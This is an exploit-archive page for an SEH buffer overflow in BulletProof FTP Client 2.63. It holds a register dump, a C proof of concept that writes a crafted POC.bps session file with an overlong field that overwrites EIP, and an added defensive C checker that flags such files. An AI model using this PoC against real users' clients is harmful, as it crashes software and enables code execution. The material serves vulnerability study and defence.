BulletProof FTP Client Buffer Overflow (SEH) exploit
Source: vfocus.net  Author: vfocus  Published: 2009-10-09
/*
BulletProof FTP Client suffers from a buffer overflow (SEH).

Tested on BulletProof FTP Client v. 2.63 build 56 (the last one), but may work with older releases as well.

Registers:

EAX 00000000
ECX 65646362
EDX 7C9032BC ntdll.7C9032BC
EBX 00000000
ESP 0012F1E0
EBP 0012F200
ESI 00000000
EDI 00000000
EIP 65646362
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00FF00FF 00FF00FF
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 000000F3 00F300F3
ST3 empty -??? FFFF 000000F3 00F300F3
ST4 empty -??? FFFF 00F4F4F4 00F4F4F4
ST5 empty 7.2337335968722701770e+18
ST6 empty 7.3060737696935038410e+18
ST7 empty 7.0169967652934372810e+18
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0

*/

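#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char *xpl;
char *str;
/* First line of a BulletProof FTP Client session (.bps) file */
char message[]="This is a BulletProof FTP Client Session-File and should not be modified directly.\n";
/* Remaining session fields written after the oversized line */
char trash[]="21\nanything\nbpfdhjomeepehepbflql\nC:\\\n/";

int main(){
    int tam;
    FILE *fp;
    printf("Made by: Rafael Sousa\n");
    printf("Produzido por Rafael Sousa\n");
    str=(char *)malloc(98*sizeof(char));
    if(str==NULL){
        return(1);
    }
    /* 93 filler bytes, then "bcde": the 4 bytes seen in ECX/EIP (65646362) in the dump above */
    memset(str,'a',93);
    str[93]='b';
    str[94]='c';
    str[95]='d';
    str[96]='e';
    str[97]='\0';
    tam=(int)(strlen(str)+strlen(message)+strlen(trash));
    printf("%d\n",tam);
    /* +2: the '\n' that sprintf puts between str and trash, plus the terminating NUL */
    xpl=(char *)malloc((tam+2)*sizeof(char));
    if(xpl==NULL){
        free(str);
        return(1);
    }
    sprintf(xpl,"%s%s\n%s",message,str,trash);
    fp=fopen("POC.bps","w");
    if(fp==NULL){
        perror("POC.bps");
        free(str);
        free(xpl);
        return(1);
    }
    fputs(xpl,fp);
    fclose(fp);
    free(str);
    free(xpl);
    return(0);
}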
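
A defender-side check for the session-file layout this PoC writes, as an added example (not part of the original exploit and not code from BulletProof FTP Client): it flags a .bps file whose line after the header is longer than the 93 filler bytes the PoC places before the bytes that reached EIP. The function names, the verdict enum and the sample values are assumptions, and 93 is a heuristic threshold taken from the PoC, not a documented limit of the application.

```c
#include <stdio.h>
#include <string.h>

/* First line of a .bps session file as the PoC writes it (newline excluded). */
static const char BPS_HEADER[] =
    "This is a BulletProof FTP Client Session-File and should not be modified directly.";

/* Heuristic from the PoC: 93 filler bytes precede the 4 bytes seen in ECX/EIP. */
#define BPS_FILLER_LEN 93

enum bps_verdict { BPS_NOT_SESSION = -1, BPS_OK = 0, BPS_OVERLONG = 1 };

/* Length of the line starting at p, without its trailing LF or CRLF. */
static size_t line_len(const char *p, const char *end)
{
    const char *nl = memchr(p, '\n', (size_t)(end - p));
    size_t n = (size_t)((nl ? nl : end) - p);
    return (n > 0 && p[n - 1] == '\r') ? n - 1 : n;
}

/* Check an in-memory session file; *field_len gets the length of the line after the header. */
enum bps_verdict bps_check(const char *data, size_t size, size_t *field_len)
{
    const size_t hdr = sizeof(BPS_HEADER) - 1;
    const char *end = data + size, *p;
    *field_len = 0;
    if (size <= hdr || memcmp(data, BPS_HEADER, hdr) != 0)
        return BPS_NOT_SESSION;
    p = data + hdr;
    if (*p == '\r' && p + 1 < end)   /* text-mode writes on Windows produce CRLF */
        p++;
    if (*p != '\n')
        return BPS_NOT_SESSION;
    *field_len = line_len(p + 1, end);
    return *field_len > BPS_FILLER_LEN ? BPS_OVERLONG : BPS_OK;
}

int main(void)
{
    char buf[512];   /* constructed samples, not real session files */
    size_t len;
    int n = snprintf(buf, sizeof buf, "%s\r\nftp.example.test\r\n21\r\n", BPS_HEADER);
    enum bps_verdict v = bps_check(buf, (size_t)n, &len);
    printf("short field:   verdict %d, length %zu\n", v, len);
    n = snprintf(buf, sizeof buf, "%s\n%097d\n21\n", BPS_HEADER, 0);  /* 97-byte line */
    v = bps_check(buf, (size_t)n, &len);
    printf("97-byte field: verdict %d, length %zu\n", v, len);
    return 0;
}
```

A mail or file gateway, or a pre-open wrapper, can run the same check on incoming .bps files and quarantine those that return BPS_OVERLONG.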

 